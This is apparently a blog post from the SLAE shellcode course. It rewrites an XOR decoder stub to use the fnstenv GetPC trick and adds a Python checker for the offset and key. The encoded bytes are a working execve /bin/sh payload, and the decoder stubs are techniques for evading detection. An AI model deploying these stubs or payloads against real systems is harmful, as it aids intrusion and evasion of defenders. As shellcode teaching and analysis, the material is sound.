Using FPU instructions to rewrite the XOR decoder assembly from the SLAE course
; Filename: xor-decoder.nasm
global _start
section .text
_start:
    jmp short call_decoder      ; JMP ...

decoder:
    pop esi                     ; ... POP: esi = address of Shellcode
    xor ecx, ecx
    mov cl, 25                  ; 25 encoded bytes to process

decode:
    xor byte [esi], 0xAA        ; strip the 0xAA key in place
    inc esi
    loop decode
    jmp short Shellcode         ; continue into the decoded bytes

call_decoder:
    call decoder                ; ... CALL pushes the address of Shellcode
Shellcode: db 0x9b,0x6a,0xfa,0xc2,0x85,0x85,0xd9,0xc2,0xc2,0x85,0xc8,0xc3,0xc4,0x23,0x49,0xfa,0x23,0x48,0xf9,0x23,0x4b,0x1a,0xa1,0x67,0x2a
This XOR decoder uses the JMP-CALL-POP technique to get the address of the shellcode and decodes it with the key 0xAA. The FPU version below replaces JMP-CALL-POP with fnstenv to obtain that address.
; Filename: fpu-xor-decoder.nasm
global _start
section .text
_start:
    xor ecx, ecx
    mov cl, 25                  ; 25 encoded bytes to process
    fldpi                       ; any FPU instruction; its address becomes the saved FPU IP
    fnstenv [esp-0xc]           ; saved FPU IP (dword 3 of the environment) lands at [esp]
    pop esi                     ; esi = address of fldpi

decode:
    xor byte [esi+0x10], 0xAA   ; Encoded starts 0x10 bytes after fldpi
    inc esi
    loop decode
    jmp short Encoded

Encoded: db 0x9b,0x6a,0xfa,0xc2,0x85,0x85,0xd9,0xc2,0xc2,0x85,0xc8,0xc3,0xc4,0x23,0x49,0xfa,0x23,0x48,0xf9,0x23,0x4b,0x1a,0xa1,0x67,0x2a
FPU instructions:
- fnstenv stores the FPU environment, which includes the address of the last FPU instruction executed, at the destination operand.
In our case fnstenv stores the environment at esp-0xc, which conveniently places the saved instruction pointer exactly at the address esp points to once fnstenv has run.
Refer to the Intel manual's figure of the 32-bit protected-mode FPU state image in memory: the instruction pointer offset is at the position of the third double word (counting from zero), i.e. at byte offset 0xc, which is why storing the environment at esp-0xc leaves that field at esp.
pop esi therefore gets the address of fldpi, the last FPU instruction executed before fnstenv.
Figuring out the number of bytes from fldpi to the Encoded shellcode is our last step; that distance (0x10 here) is the displacement used in xor byte [esi+0x10], 0xAA.
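As an added example (not from the original post), the following Python script checks the two values the FPU decoder depends on offline, the way an analyst triaging such a stub would: it sums the stub's instruction lengths to confirm the 0x10 displacement from fldpi to Encoded, and XOR-decodes the stored bytes with 0xAA so the recovered content can be inspected. The machine-code bytes in STUB are what NASM emits for the listed 32-bit instructions.

```python
# Added example, not part of the original post: verify the 0x10 displacement
# and the 0xAA key of the fnstenv-based decoder without running the stub.

# Encoded bytes exactly as they appear at the Encoded label in the post.
ENCODED = bytes([
    0x9b, 0x6a, 0xfa, 0xc2, 0x85, 0x85, 0xd9, 0xc2, 0xc2, 0x85, 0xc8, 0xc3, 0xc4,
    0x23, 0x49, 0xfa, 0x23, 0x48, 0xf9, 0x23, 0x4b, 0x1a, 0xa1, 0x67, 0x2a,
])
KEY = 0xAA

# 32-bit machine code of the stub from fldpi up to the Encoded label.
# "d9 74 24 f4" (fnstenv [esp-0xc]) is a well-known GetPC signature that IDS
# and AV rules match on; the XOR encoding does not hide the stub itself.
STUB = [
    ("fldpi",                     "d9eb"),
    ("fnstenv [esp-0xc]",         "d97424f4"),
    ("pop esi",                   "5e"),
    ("xor byte [esi+0x10], 0xAA", "807610aa"),
    ("inc esi",                   "46"),
    ("loop decode",               "e2f9"),  # rel8 -7, back to the xor
    ("jmp short Encoded",         "eb00"),  # rel8 0, label follows directly
]

def fldpi_to_encoded_offset(stub=STUB):
    """Byte distance from fldpi (the address pop esi receives) to Encoded."""
    return sum(len(bytes.fromhex(code)) for _, code in stub)

def displacement_in_stub(stub=STUB):
    """The disp8 actually encoded in the xor instruction (80 /6 ib, byte 2)."""
    return bytes.fromhex(dict(stub)["xor byte [esi+0x10], 0xAA"])[2]

def xor_decode(data, key):
    """Undo the single-byte XOR exactly as the decode loop does."""
    return bytes(b ^ key for b in data)

def printable_strings(data, min_len=4):
    """ASCII runs of at least min_len bytes in the decoded payload."""
    runs, cur = [], bytearray()
    for b in data + b"\x00":          # sentinel flushes the final run
        if 0x20 <= b < 0x7f:
            cur.append(b)
            continue
        if len(cur) >= min_len:
            runs.append(cur.decode("ascii"))
        cur = bytearray()
    return runs

if __name__ == "__main__":
    off = fldpi_to_encoded_offset()
    print(f"fldpi -> Encoded: 0x{off:x} bytes, disp8 in stub: 0x{displacement_in_stub():x}")
    decoded = xor_decode(ENCODED, KEY)
    print("decoded:", decoded.hex(" "), "strings:", printable_strings(decoded))
```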